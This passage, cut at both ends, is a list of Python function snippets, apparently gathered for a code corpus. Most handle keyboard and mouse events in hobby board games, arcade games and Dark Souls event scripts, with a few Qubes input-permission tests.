self.p2pGame.sendTicTacToeData(text=data)\n\n\n elif self.is_a_draw():\n self.gamestate = self.STATE_GAME_OVER\n self.gameover_screen('Egalité')\n data = \"--D\"\n self.p2pGame.playerTurn = 'X'\n self.p2pGame.sendTicTacToeData(text=data)\n\n else:\n data = \"--X:\"+ str(x) + \":\" + str(y)\n self.p2pGame.playerTurn = 'O'\n self.p2pGame.sendTicTacToeData(text=data)\n # self.gamestate = self.STATE_O_TURN\n #self.launch()\n elif(self.p2pGame.playerTurn == 'O' and self.player == 2):\n self.new_move(x, y, self.player)\n\n if self.has_won(self.player):\n self.gamestate = self.STATE_GAME_OVER\n if self.player == 1:\n self.gameover_screen('X Gagne')\n data = \"--W:X\"\n else:\n self.gameover_screen('O Gagne')\n data = \"--W:O\"\n self.p2pGame.playerTurn = 'X'\n self.p2pGame.sendTicTacToeData(text=data)\n\n\n elif self.is_a_draw():\n self.gamestate = self.STATE_GAME_OVER\n self.gameover_screen('Egalité')\n data = \"--D\"\n self.p2pGame.playerTurn = 'X'\n self.p2pGame.sendTicTacToeData(text=data)\n\n else:\n data = \"--O:\"+ str(x) + \":\" + str(y)\n self.p2pGame.playerTurn = 'X'\n self.p2pGame.sendTicTacToeData(text=data)\n # self.gamestate = self.STATE_O_TURN\n #self.launch()\n elif self.gamestate == self.STATE_GAME_OVER:\n #reset\n self.new_board()\n self.gamestate = self.FIRST_PLAYER\n self.p2pGame.sendPlayAgain(\"--A\")", "def selection_board_maintenance(self,x_cor,y_cor):\t\t\r\n\t\tfor event in pygame.event.get():\r\n\t\t\tif event.type == pygame.QUIT:\r\n\t\t\t\tpygame.display.quit()\r\n\t\t\t\tpygame.quit()\r\n\t\t\t\tquit() \r\n\r\n\t\t\tif event.type == pygame.MOUSEBUTTONDOWN:\r\n\t\t\t\t#print(\"mouse is pressed\")\r\n\t\t\t\t#everything begins here\r\n\t\t\t\tx_adjusted,y_adjusted,who_is_clicked,piece = Helping_Class.convert_coordinate(x_cor,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t y_cor,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'selection_bar')\r\n\t\t\t\t#print(who_is_clicked)\r\n\t\t\t\tif (self.selected_from_selection_bar + self.selected_from_board):\r\n\t\t\t\t\t#print(\"inside selected item one\")\r\n\t\t\t\t\tif Helping_Class._check_if_clicked_on_his_own_piece_(self.whose_move,who_is_clicked):\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\tif self.pieces[piece].availability:\r\n\t\t\t\t\t\t\tself.selected_from_board = False\r\n\t\t\t\t\t\t\tself.selected_from_selection_bar = True\r\n\r\n\t\t\t\t\t\t\t#update \r\n\t\t\t\t\t\t\tself.selected_piece = piece\r\n\t\t\t\t\t\t\tself.selected_position 
=Helping_Class.selection_bar_reverse_mapping[piece]\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\t#nothing to do\r\n\t\t\t\t\t\tpass\r\n\t\t\t\telse:\r\n\t\t\t\t\t#print(\"nothing is selected\")\r\n\t\t\t\t\t#check if clicked on his piece change then select it\r\n\t\t\t\t\tif Helping_Class._check_if_clicked_on_his_own_piece_(self.whose_move,who_is_clicked):\r\n\r\n\t\t\t\t\t\tif self.pieces[piece].availability:\r\n\t\t\t\t\t\t\tself.selected_from_selection_bar = True\r\n\r\n\t\t\t\t\t\t\t#update \r\n\t\t\t\t\t\t\tself.selected_piece = piece\r\n\t\t\t\t\t\t\tself.selected_position =(x_adjusted,y_adjusted)\r\n\t\t\t\t\t\t\t#print(self.selected_piece,self.selected_position,self.selected_from_selection_bar)\r\n\r\n\t\t\t\t\t\t\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\t#nothing to do\r\n\t\t\t\t\t\tpass\r\n\t\t\t\t\t\t\r\n\t\t\t\t\r\n\t\t\telse:\r\n\t\t\t\t#color change\r\n\t\t\t\t#who_is_clicked is dummy variable as no click has occurred\r\n\t\t\t\tx_adjusted,y_adjusted,who_is_clicked,piece = Helping_Class.convert_coordinate(x_cor,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t y_cor,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'selection_bar')\r\n\r\n\t\t\t\tself.blit_piece = [(x_adjusted,y_adjusted),piece]", "def move_draught_begin(event):\n global red_draughts, white_draughts\n global board_array\n global click_offset\n global old_point\n draught = board.find_withtag(CURRENT)[0]\n click_offset = [event.x-board.coords(draught)[0],event.y-board.coords(draught)[1]] #How far off the click is from the coordinates of the draught it's moving\n bottom = (event.y-click_offset[1] >= board_height//2)\n point_left_edges = [board_divisions*i for i in xrange(0,15) if i != 7]\n if bottom == False:\n if(event.x-click_offset[0] == 7*board_divisions): #If on the white bar\n old_point = 25\n else:\n old_point = 12+point_left_edges.index(min(point_left_edges, key=lambda x:abs(x-event.x+click_offset[0])))\n else:\n if(event.x-click_offset[0] == 7*board_divisions): #If on the red bar\n old_point = 0\n else:\n old_point = 13-point_left_edges.index(min(point_left_edges, key=lambda x:abs(x-event.x+click_offset[0])))", "def process_IN_MOVE_SELF(self, event):", "def _check_keydown_events(self, event):\n if event.key == pygame.K_RIGHT:\n self.rocket.moving_right = True\n elif event.key == pygame.K_LEFT:\n self.rocket.moving_left = True\n elif event.key == pygame.K_UP:\n self.rocket.moving_up = True\n elif event.key == pygame.K_DOWN:\n self.rocket.moving_down = True\n elif event.key == pygame.K_q:\n sys.exit()", "def test_020_mouse_keyboard_mouse_only(self):\n self.allow_service('qubes.InputMouse')\n self.setUpDevice(['BTN_LEFT', 'BTN_RIGHT', 'REL_X', 'REL_Y'] + keyboard_events)\n self.find_device_and_start_listener()\n self.emit_event('REL_X', 1)\n self.emit_event('REL_X', 1)\n self.emit_event('REL_Y', 1)\n self.emit_event('REL_Y', 1)\n self.emit_click('BTN_LEFT')\n\n self.assertEvent(['RawMotion', '0', {'0': '1.00', '1': '0.00'}])\n self.assertEvent(['RawMotion', '0', {'0': '1.00', '1': '0.00'}])\n self.assertEvent(['RawMotion', '0', {'1': '1.00', '0': '0.00'}])\n self.assertEvent(['RawMotion', '0', {'1': '1.00', '0': '0.00'}])\n self.assertEvent(['RawButtonPress', '1', {}])\n self.assertEvent(['RawButtonRelease', '1', {}])\n\n self.emit_event('KEY_A', 1)\n self.emit_event('KEY_B', 1)\n self.emit_event('KEY_C', 1)\n self.emit_event('KEY_D', 1)\n self.assertNoEvent(msg=\"keyboard should be denied\")", "def check_events(ai, var, screen, ship, shots, enemies, charges, shields, blasters, hub):\r\n\tfor event in pygame.event.get():\r\n\t\tif 
event.type == pygame.QUIT:\r\n\t\t\tsys.exit()\r\n\t\telif event.type == pygame.KEYDOWN:\r\n\t\t\tkey_down(event, ai, var, screen, ship, shots, enemies, charges, shields, hub)\r\n\t\telif event.type == pygame.KEYUP:\r\n\t\t\tkey_up(event, ai, var, screen, ship, charges, shields, blasters, hub)", "def check_events(ai_settings, screen, stats, sb, play_button, ship, aliens, bullets):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n check_keydown_events(event, ai_settings, screen, ship, bullets)\n elif event.type == pygame.KEYUP:\n check_keyup_events(event, ship)\n elif event.type == pygame.MOUSEBUTTONDOWN:\n mouse_x, mouse_y = pygame.mouse.get_pos()\n check_play_button(\n ai_settings,\n screen,\n stats,\n sb,\n play_button,\n ship,\n aliens,\n bullets,\n mouse_x,\n mouse_y,\n )", "def _check_keydown_events(self, event):\n if event.key == pygame.K_ESCAPE:\n sys.exit()\n if event.key == pygame.K_RETURN:\n self.main.switch_gamestate(self, self.main.game_screen)", "def main():\n \n games = 'chess simon puzzle chess go slide go sudoku snake'.split()\n gi = 0\n game = games[gi]\n board = set_game(game)\n board.keys[K_t] = test\n \n while board.active:\n for event in pygame.event.get():\n board.do_event(event)\n if event.type == KEYDOWN:\n if event.key == K_g:\n gi = (gi + 1) % len(games)\n board = set_game(games[gi])\n \n board.update()\n \n pygame.quit()", "def setShortcuts(self):\n self.game.app.accept('mouse1', self.onMouse1Down)\n self.game.app.accept('mouse3', self.onMouse2Down)\n self.game.app.accept('space', self.onSpaceBarClear)\n if self.enableMouseCamControl == 1:\n self.game.app.accept('wheel_up', self.onMouseWheelUp)\n self.game.app.accept('wheel_down', self.onMouseWheelDown)", "def event11510090():\n header(11510090, 0)\n fog_wall, fog_sfx, intended_side_trigger_area, opposite_side_trigger_area = define_args('iiii')\n skip_if_this_event_slot_off(3)\n obj.disable(fog_wall)\n sfx.delete_map_sfx(fog_sfx, False)\n end()\n\n if_action_button_state_and_line_segment(1, 'region', intended_side_trigger_area, 0, 0, 0, 10010403,\n ReactionAttribute.human_or_hollow, 0, line_segment_endpoint_id=fog_wall)\n if_action_button_state_and_line_segment(2, 'region', opposite_side_trigger_area, 0, 0, 0, 10010407,\n ReactionAttribute.human_or_hollow, 0, line_segment_endpoint_id=fog_wall)\n if_condition_true(-1, 1)\n if_condition_true(-1, 2)\n if_condition_true(0, -1)\n skip_if_condition_true_finished(2, 2)\n warp.short_warp(CHR.Player, 'region', intended_side_trigger_area, -1)\n skip(1)\n warp.short_warp(CHR.Player, 'region', opposite_side_trigger_area, -1)\n anim.force_animation(CHR.Player, 7410)\n obj.disable(fog_wall)\n sfx.delete_map_sfx(fog_sfx, True)", "def _check_events(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n # Modify game response when player presses a key\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_RIGHT:\n self.ship.moving_right = True\n elif event.key == pygame.K_LEFT:\n self.ship.moving_left = True\n elif event.key == pygame.K_q:\n sys.exit()\n elif event.key == pygame.K_SPACE:\n self.bomb_status = False\n self.settings.debomb()\n self._fire_bullet()\n mixer.music.load('E:\\Sky-Fall\\SOUNDS\\shots.ogg')\n mixer.music.play()\n elif event.key == pygame.K_b:\n self.bomb_status = True\n self.settings.bomb()\n self._fire_bullet() \n elif event.type == pygame.KEYUP:\n if event.key == pygame.K_RIGHT:\n self.ship.moving_right = False\n elif event.key == 
pygame.K_LEFT:\n self.ship.moving_left = False\n elif event.type == pygame.MOUSEBUTTONDOWN:\n mouse_pos = pygame.mouse.get_pos()\n self._check_play_button(mouse_pos)", "def handle_input(self, events):\n for event in events:\n if event.type == QUIT:\n sys.exit(0)\n\n elif event.type == MOUSEMOTION:\n if self.is_in_bounds(event.pos):\n self.editor_cursor_position = self.position_screen_to_grid(event.pos)\n if self.mode_paint:\n self.put_block()\n elif self.mode_erase:\n self.erase_block()\n elif event.type == MOUSEBUTTONDOWN:\n if event.button == MB_LEFT:\n if self.is_in_bounds(event.pos):\n self.put_block()\n self.mode_paint = True\n self.mode_erase = False\n elif event.button == MB_RIGHT:\n if self.is_in_bounds(event.pos):\n self.erase_block()\n self.mode_erase = True\n self.mode_paint = False\n elif event.button == MB_MIDDLE:\n if self.is_in_bounds(event.pos):\n self.pick_block()\n elif event.button == MB_WHEEL_DOWN:\n self.next_block_type()\n elif event.button == MB_WHEEL_UP:\n self.prev_block_type()\n # print str(self.mode_paint) + \" \" + str(self.mode_erase)\n elif event.type == MOUSEBUTTONUP:\n self.mode_paint = False\n self.mode_erase = False\n elif event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n # from GameStateMenu import GameStateMenu\n self.context[\"gamestate\"] = self.prev_state\n if event.key == K_MINUS or event.key == K_KP_MINUS:\n self.prev_block_type()\n elif event.key == K_EQUALS or event.key == K_KP_PLUS:\n self.next_block_type()\n elif event.key == K_0 or event.key == K_KP0:\n self.current_block_type = 0\n elif event.key == K_F5:\n self.save()\n elif event.key == K_F9:\n self.open()\n # else:\n # print event", "def check_events_lobby_screen(ai_settings, grid,screen, buttons,screen_status, button_status, card_database_filter, user, action, player2):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n clear_text_file(ai_settings,grid, screen, buttons,screen_status, button_status, card_database_filter, user, action, player2)\n button_status.lobby_screen_room_detail_display = 'none'\n sys.exit()\n\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n clear_text_file(ai_settings,grid, screen, buttons,screen_status, button_status, card_database_filter, user, action, player2)\n button_status.lobby_screen_room_detail_display = 'none'\n sys.exit()\n\n elif event.type == pygame.MOUSEBUTTONDOWN:\n # Back button\n if Rect(0, 0, 50, 50).collidepoint(pygame.mouse.get_pos()):\n clear_text_file(ai_settings,grid, screen, buttons,screen_status, button_status, card_database_filter, user, action, player2)\n button_status.lobby_screen_room_detail_display = 'none'\n screen_status.lobby_screen_display = False\n screen_status.welcome_screen_display = True\n # Change name button\n elif Rect(780, 10, 110, 30).collidepoint(pygame.mouse.get_pos()):\n button_status.text_input_box_display = True\n\n # Create/next/ready/start button\n elif Rect(920, 607, 100, 50).collidepoint(pygame.mouse.get_pos()):\n # create\n if button_status.lobby_screen_room_detail_display == 'none':\n if button_status.lobby_screen_room_list_display == 'N/A':\n button_status.lobby_screen_room_detail_display = 'my'\n button_status.lobby_screen_room_status = '1/2'\n button_status.lobby_screen_room_list_display = user.name\n\n #my next/ready/start\n elif button_status.lobby_screen_room_detail_display == 'my' and button_status.lobby_screen_room_status == '2/2':\n if button_status.lobby_screen_prepare_to_go_display == False:\n button_status.lobby_screen_prepare_to_go_display = True\n elif 
button_status.lobby_screen_prepare_to_go_display == True:\n # Click on ready\n if button_status.lobby_screen_my_ready_to_go == False:\n lobby_screen_to_other_ready_action(ai_settings, screen,buttons, screen_status, button_status, card_database_filter, user, player2)\n\n\n # Click on play\n elif button_status.lobby_screen_my_ready_to_go == True and button_status.lobby_screen_other_ready_to_go == True:\n button_status.lobby_screen_game_start = True\n lobby_screen_game_start_action(ai_settings, grid,screen, buttons,screen_status, button_status, card_database_filter, user, action, player2)\n\n\n\n # other Ready\n elif button_status.lobby_screen_room_detail_display == 'other' and button_status.lobby_screen_prepare_to_go_display == True:\n lobby_screen_to_other_ready_action(ai_settings, screen,buttons, screen_status, button_status, card_database_filter, user, player2)\n\n\n # click on ok on end screen warning sign\n elif Rect(1100, 642, 40, 30).collidepoint(pygame.mouse.get_pos()):\n button_status.lobby_screen_end_screen_warning_button_display = ''\n\n # Join\n elif Rect(530, 230, 50, 30).collidepoint(pygame.mouse.get_pos()):\n if button_status.lobby_screen_room_detail_display == 'none':\n button_status.lobby_screen_room_detail_display = 'other'\n button_status.lobby_screen_room_status = '2/2'\n # quit\n elif Rect(920, 684, 100, 50).collidepoint(pygame.mouse.get_pos()):\n if button_status.lobby_screen_room_detail_display == 'my' or button_status.lobby_screen_room_detail_display == 'other':\n clear_text_file(ai_settings,grid, screen, buttons,screen_status, button_status, card_database_filter, user, action, player2)\n button_status.lobby_screen_room_detail_display = 'none'\n button_status.lobby_screen_room_list_display = 'N/A'\n #button_status.lobby_screen_room_status = '0/2'\n\n # When in lobby_prepare to go screen\n for i in range(1,7):\n # Display edit/delete buttons\n if Rect(85 + 180* (i-1), 165, 130,110).collidepoint(pygame.mouse.get_pos()):\n with open('user_deck_list_string.txt','r') as f:\n f.seek(0)\n for line in f:\n if 'DECK_LIST_' + str(i) in line:\n user.deck_list_index = str(i)\n\n # Click on Edit\n elif Rect(85 + 180* (i-1), 282, 60, 30).collidepoint(pygame.mouse.get_pos()):\n with open('user_deck_list_string.txt','r') as f:\n f.seek(0)\n for line in f:\n if 'DECK_LIST_' + str(i) in line:\n user.deck_list = make_card_list_from_string(line.replace('DECK_LIST_' + str(i) + ' = ', ''), ai_settings, screen, buttons,screen_status, button_status, card_database_filter, user, player2)\n if 'CHARACTER_' + str(i) in line:\n user.character_card = eval('card_' + line.replace('CHARACTER_' + str(i) + ' = ', '')[7:12])\n screen_status.build_deck_screen_display = True\n screen_status.lobby_screen_display = False\n\n # Click on Delete\n elif Rect(155 + 180* (i-1), 282, 60, 30).collidepoint(pygame.mouse.get_pos()):\n with open('user_deck_list_string.txt','r') as f:\n f.seek(0)\n for line in f:\n if 'DECK_LIST_' + str(i) in line:\n\n with open('user_deck_list_string.txt','a+') as f:\n\n f.seek(0)\n x = f.readlines()\n y = 1\n\n f.seek(0)\n for line in f:\n if 'DECK_LIST_' + str(i) not in line:\n y += 1\n else:\n break\n\n del x[y-1] # Delete DECK_LIST_\n del x[y-1] # Delete CHARACTER_\n\n with open('user_deck_list_string.txt','w') as f:\n f.writelines(x)\n\n user.deck_list_index = 'new'\n\n # create new deck\n if Rect(1020, 110, 120, 35).collidepoint(pygame.mouse.get_pos()):\n with open('user_deck_list_string.txt','r') as f:\n f.seek(0)\n if len(f.readlines()) >= 12:\n pass\n\n else:\n 
user.deck_list_index = 'new'\n user.deck_list = []\n user.character_card = ''\n screen_status.build_deck_screen_display = True\n screen_status.lobby_screen_display = False", "def player_stage(niv): \n playing = True\n a = niv[0][0] \n b = niv[0][1] \n (x, y) = (a, b) \n state = [[a, b]] #Create a list with the starting point of the selected level patern.\n sense.stick.get_events()\n while playing:\n for event in sense.stick.get_events(): #It moves the pixel with the player moves and add the point passed by the player in the state[].\n if event.action == 'pressed':\n if event.direction == 'left':\n if x > 0:\n x = min(x-1, 7)\n state.append([x, y])\n elif event.direction == 'right':\n if x < 7:\n x = max(x+1, 0)\n state.append([x, y])\n if event.direction == 'down':\n if y < 7:\n y = min(y+1, 7)\n state.append([x, y])\n elif event.direction == 'up':\n if y > 0:\n y = max(y-1, 0)\n state.append([x, y])\n elif event.direction == 'middle':\n playing = False\n sense.set_pixel(x, y, RED)\n if state[:] == niv[:]: #Compare the way choosen by the player with the selected level patern. Results of the try.\n sense.show_message(\"WINNER !\",\n text_colour=LEMON, scroll_speed=0.05)\n sleep(2)\n main() #brings back to the level selection.\n else:\n sense.show_message(\"LOSER !\",\n text_colour=BLUE, scroll_speed=0.05)\n sleep(2)\n try_again(niv) #cf. try_again() function", "def keyCam(self, event):\n dct = {\n \"d\": 0,\n \"s\": 1,\n \"q\": 2,\n \"z\": 3\n }[event.char]\n self.moveAllSeg(dct)", "def test_010_mouse_deny_keyboard(self):\n self.allow_service('qubes.InputMouse')\n self.setUpDevice(mouse_events)\n self.find_device_and_start_listener()\n self.emit_event('KEY_A', 1)\n self.emit_event('KEY_B', 1)\n self.emit_event('KEY_C', 1)\n self.emit_event('KEY_D', 1)\n self.assertNoEvent(msg=\"keyboard should be denied\")", "def event11510450():\n header(11510450, 1)\n if_does_not_have_tae_event(0, CHR.Gwyndolin, 600)\n if_has_tae_event(0, CHR.Gwyndolin, 600)\n\n flag.disable_chunk(11515150, 11515151)\n flag.enable_random_in_chunk(11515150, 11515151)\n chr.disable(CHR.Gwyndolin)\n wait(1.0)\n\n # First two warps are always forward.\n skip_if_event_flag_on(2, 11515110)\n run_event_with_slot(11515110, 0, args=(1512710, 11515110))\n restart()\n skip_if_event_flag_on(2, 11515111)\n run_event_with_slot(11515110, 1, args=(1512711, 11515111))\n restart()\n\n for warp_number in range(2, 40):\n skip_if_event_flag_on(7, 11515110 + warp_number)\n\n skip_if_event_flag_on(2, 11515151)\n # Standard forward warp.\n run_event_with_slot(11515110, warp_number, args=(1512710 + warp_number, 11515110 + warp_number))\n skip(2)\n # Backward warp.\n flag.disable(11515110 + warp_number - 1) # Lose corridor progress.\n run_event_with_slot(11515110, warp_number - 2, args=(1512710 + warp_number - 2, 11515110 + warp_number - 2))\n\n chr.rotate_to_face_entity(CHR.Gwyndolin, CHR.Player)\n restart()", "def play_gui():\n global done\n GAME_OVER = False\n pygame.init()\n board = create_board()\n\n screen = pygame.display.set_mode(SIZE)\n draw_board(board, screen)\n pygame.display.update()\n\n myfont = pygame.font.SysFont(\"monospace\", 75)\n turn = np.random.randint(0, 2)\n\n while not GAME_OVER:\n g = Game()\n done = False\n transitions_agent = []\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n\n if event.type == pygame.MOUSEMOTION:\n pygame.draw.rect(screen, black, (0, 0, WIDTH, SQUARESIZE))\n posx = event.pos[0]\n if turn == PLAYER:\n pygame.draw.circle(screen, red, (posx, int(SQUARESIZE / 2)), 
RADIUS)\n pygame.display.update()\n\n if event.type == pygame.MOUSEBUTTONDOWN:\n pygame.draw.rect(screen, black, (0, 0, WIDTH, SQUARESIZE))\n\n if turn == PLAYER:\n posx = event.pos[0]\n col = int(math.floor(posx / SQUARESIZE))\n\n if is_valid_location(board, col):\n row = get_next_open_row(board, col)\n drop_piece(board, row, col, PLAYER_PIECE)\n\n if winning_move(board, PLAYER_PIECE):\n label = myfont.render(\"Player 1 wins!!\", 1, red)\n screen.blit(label, (40, 10))\n GAME_OVER = True\n\n turn = (turn + 1) % 2\n draw_board(board, screen)\n\n # # Ask for Player 2 Input\n if turn == AI and not GAME_OVER:\n observation = []\n #print(f\"BOARD: {board}\")\n temp_board = np.flipud(board)\n for col in range(COLUMN_COUNT):\n col_elements = temp_board[:,col]\n for element in col_elements:\n observation.append(element)\n\n #print(f\"OBS: {observation}\")\n observation = np.asarray(observation)\n col = agent.choose_action(observation)\n\n if is_valid_location(board, col):\n row = get_next_open_row(board, col)\n drop_piece(board, row, col, AI_PIECE)\n\n if winning_move(board, AI_PIECE):\n label = myfont.render(\"Player 2 wins!!\", 1, yellow)\n screen.blit(label, (40, 10))\n GAME_OVER = True\n\n draw_board(board, screen)\n turn = (turn + 1) % 2\n\n else:\n print(\"AI random choice\")\n col = np.random.randint(7)\n row = get_next_open_row(board, col)\n drop_piece(board, row, col, AI_PIECE)\n\n if winning_move(board, AI_PIECE):\n label = myfont.render(\"Player 2 wins!!\", 1, yellow)\n screen.blit(label, (40, 10))\n GAME_OVER = True\n\n draw_board(board, screen)\n turn = (turn + 1) % 2", "def move_draught_end(event):\n global red_draughts, white_draughts\n global board_array\n global old_point\n global die_1_num, die_2_num, doubles\n draught = board.find_withtag(CURRENT)[0]\n #Figure out which point they want to put it on\n bottom = (event.y-click_offset[1] >= board_height//2)\n point_left_edges = [board_divisions*i for i in xrange(0,15) if i != 7]\n is_red = draught in red_draughts\n if bottom == False:\n new_point = 12+point_left_edges.index(min(point_left_edges, key=lambda x:abs(x-event.x+click_offset[0])))\n else:\n new_point = 13-point_left_edges.index(min(point_left_edges, key=lambda x:abs(x-event.x+click_offset[0]))) \n #Check legality\n if(board_array[new_point][1] > 1 and is_red) or (board_array[new_point][0] > 1 and not is_red): #if too many opposite color on square\n draw_draughts()\n return\n if(board_array[0][0] > 0 and is_red and old_point != 0)or(board_array[25][1] > 0 and not is_red and old_point != 25):#Obligated to move off bar first\n draw_draughts()\n return\n if(new_point == 0 and not is_red): #if white trying to bear off\n for i in xrange(7,26):\n if(board_array[i][1] > 0): #If white has a piece outside home, can't bear off\n draw_draughts()\n return\n if(new_point == 25 and is_red): #if red trying to bear off\n for i in xrange(0,18):\n if(board_array[i][0] > 0): #If red has a piece outside home, can't bear off\n draw_draughts()\n return \n \n if(new_point-old_point == die_1_num and is_red) or (old_point-new_point == die_1_num and not is_red):\n if(doubles == False) or (die_2_num != 0):\n die_1_num = 0\n else: \n die_2_num = die_1_num\n doubles = False\n elif(new_point-old_point == die_2_num and is_red) or (old_point-new_point == die_2_num and not is_red):\n if(doubles == False) or (die_1_num != 0):\n die_2_num = 0\n else: \n die_1_num = die_2_num\n doubles = False\n else: #Can't move there on this roll\n draw_draughts()\n return\n update_dice()\n #Update board_array\n if 
is_red:\n board_array[old_point][0] -= 1\n board_array[new_point][0] += 1\n if(board_array[new_point][1] == 1): #Handle hits\n board_array[new_point][1] -= 1\n board_array[25][1] += 1\n else:\n board_array[old_point][1] -= 1\n board_array[new_point][1] += 1\n if(board_array[new_point][0] == 1): #Handle hits\n board_array[new_point][0] -= 1\n board_array[0][0] += 1\n\n draw_draughts()\n if(die_1_num == 0 and die_2_num == 0):\n comp_turn()", "def make_turn(self):\n # if play first, start in the middle\n if np.count_nonzero(self.board) == 0:\n self.place_disc(self.board.shape[1] / 2)\n return 1\n\n\n # win if possible\n for try_column in range(0,self.board.shape[1]):\n if 0 == self.board[0, try_column]:\n new_board = self.simulate_place_disc(self.board, try_column, self.id())\n if dhw.did_he_win(new_board, self.id(), try_column):\n self.place_disc(try_column)\n return 1\n\n # don't loose if in danger\n for try_column in range(0, self.board.shape[1]):\n if 0 == self.board[0,try_column]:\n new_board = self.simulate_place_disc(self.board, try_column, 3 - self.id())\n if dhw.did_he_win(new_board, 3 - self.id(), try_column):\n self.place_disc(try_column)\n return 1\n\n # don't fall in trap!\n forbidden_columns = []\n for try_column in range(0, self.board.shape[1]):\n if 0 == self.board[0,try_column]:\n new_board = self.simulate_place_disc(self.board, try_column, self.id()) # my move\n new_board = self.simulate_place_disc(new_board, try_column, 3 - self.id()) # enemy move\n if dhw.did_he_win(new_board, 3 - self.id(), try_column):\n if try_column not in forbidden_columns: forbidden_columns.append(try_column)\n\n # don't ruin my trap\n for try_column in range(0, self.board.shape[1]):\n if 0 == self.board[0,try_column]:\n new_board = self.simulate_place_disc(self.board, try_column, 3 - self.id()) # 'my' move\n new_board = self.simulate_place_disc(new_board, try_column, self.id()) # my move\n if dhw.did_he_win(new_board, self.id(), try_column):\n if try_column not in forbidden_columns: forbidden_columns.append(try_column)\n\n # allow forbidden_columns if no other choice\n if np.count_nonzero(self.board[0, :]) == self.board.shape[1] - len(forbidden_columns):\n forbidden_columns = []\n\n # otherwise, play randomly\n rannum = random.randrange(7)\n while 0 != self.board[0, rannum] or rannum in forbidden_columns:\n rannum = random.randrange(7)\n self.place_disc(rannum)\n return 1", "def next(self):\n \n jump = 0\n \n for event in pudding.process_event():\n if event[0] == sdlconst.KEYDOWN:\n if (event[1] == sdlconst.K_q) or (event[1] == sdlconst.K_ESCAPE):\n tofu.GAME_INTERFACE.end_game() # Quit the game\n \n elif event[1] == sdlconst.K_m:\n print \"trying to change single to multiplayer mode\"\n tofu.GAME_INTERFACE.end_game('client')\n \n elif event[1] == sdlconst.K_LSHIFT:\n # Shift key is for jumping\n # Contrary to other action, jump is only performed once, at the beginning of\n # the jump.\n jump = 1\n \n elif event[1] == sdlconst.K_LEFT: self.left_key_down = 1\n elif event[1] == sdlconst.K_RIGHT: self.right_key_down = 1\n elif event[1] == sdlconst.K_UP: self.up_key_down = 1\n elif event[1] == sdlconst.K_DOWN: self.down_key_down = 1\n \n elif event[0] == sdlconst.KEYUP:\n if event[1] == sdlconst.K_LEFT: self.left_key_down = 0\n elif event[1] == sdlconst.K_RIGHT: self.right_key_down = 0\n elif event[1] == sdlconst.K_UP: self.up_key_down = 0\n elif event[1] == sdlconst.K_DOWN: self.down_key_down = 0\n \n if jump: return Action(ACTION_JUMP)\n \n # People saying that Python doesn't have switch/select case 
are wrong...\n # Remember this if you are coding a fighting game !\n return Action({\n (0, 0, 1, 0) : ACTION_ADVANCE,\n (1, 0, 1, 0) : ACTION_ADVANCE_LEFT,\n (0, 1, 1, 0) : ACTION_ADVANCE_RIGHT,\n (1, 0, 0, 0) : ACTION_TURN_LEFT,\n (0, 1, 0, 0) : ACTION_TURN_RIGHT,\n (0, 0, 0, 1) : ACTION_GO_BACK,\n (1, 0, 0, 1) : ACTION_GO_BACK_LEFT,\n (0, 1, 0, 1) : ACTION_GO_BACK_RIGHT,\n }.get((self.left_key_down, self.right_key_down, self.up_key_down, self.down_key_down), ACTION_WAIT))", "def check_events(ai_settings,screen,stats,play_button,ship,aliens,bullets,sb):\n\t# Observe eventos de teclado e de mouse\n\tfor event in pygame.event.get():\n\t\t\n\t\tif event.type == pygame.QUIT:\n\t\t\t\n\t\t\tstats.file.stored_high_score(stats.high_score)\n\n\t\t\tsys.exit()\n\n\t\telif event.type == pygame.MOUSEBUTTONDOWN:\n\t\t\tmouse_x,mouse_y = pygame.mouse.get_pos()\n\t\t\tcheck_play_button(ai_settings,screen,stats,play_button,ship\n\t\t\t\t,aliens,bullets,mouse_x,mouse_y,sb)\n\n\n\t\telif event.type == pygame.KEYDOWN:\n\t\t\t\n\t\t\tcheck_keydown_events(event,ai_settings,screen,ship,bullets,stats,\n\t\t\t\taliens,sb)\n\n\t\telif event.type == pygame.KEYUP:\n\n\t\t\tcheck_keyup_events(event,ship)", "def manual_play(self):\r\n if self.manual_moves:\r\n move = self.manual_moves.pop()\r\n self.new_edge(move)\r\n return True\r\n\r\n self.mw.update() \r\n \r\n return False", "def main():\n #Initialize game\n game = QuoridorGame()\n run = True\n clock = pygame.time.Clock()\n move_type = None\n\n #Run loop\n while run:\n clock.tick(FPS)\n\n for event in pygame.event.get():\n #Quit if user exits window\n if event.type == pygame.QUIT:\n run = False\n\n #Get board list representation and player turn\n board_list = game.get_board()\n player_turn = game.get_player_turn()\n\n #Draw board and player pawns\n draw_board(WIN, board_list)\n draw_players(WIN, game.get_p1_location(), game.get_p2_location())\n if move_type == 'p':\n highlight_moves(WIN, game)\n if move_type == 'h':\n highlight_available_h_fences(WIN, game)\n if move_type == 'v':\n highlight_available_v_fences(WIN, game)\n \n #Get user move type \n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_p:\n move_type = 'p'\n if event.key == pygame.K_h:\n move_type = 'h'\n if event.key == pygame.K_v:\n move_type = 'v'\n \n #Make move based on mouse input and move type\n if event.type == pygame.MOUSEBUTTONDOWN and move_type == 'p':\n pos = pygame.mouse.get_pos()\n move_pawn(pos, game)\n if event.type == pygame.MOUSEBUTTONDOWN and move_type == 'h':\n pos = pygame.mouse.get_pos()\n place_horizontal_fence(pos, game)\n if event.type == pygame.MOUSEBUTTONDOWN and move_type == 'v':\n pos = pygame.mouse.get_pos()\n place_vertical_fence(pos, game)\n \n #Reset move type after player makes a valid move\n if player_turn != game.get_player_turn():\n move_type = None\n \n #Display message if either user has won the game. \n if game.is_winner(1):\n 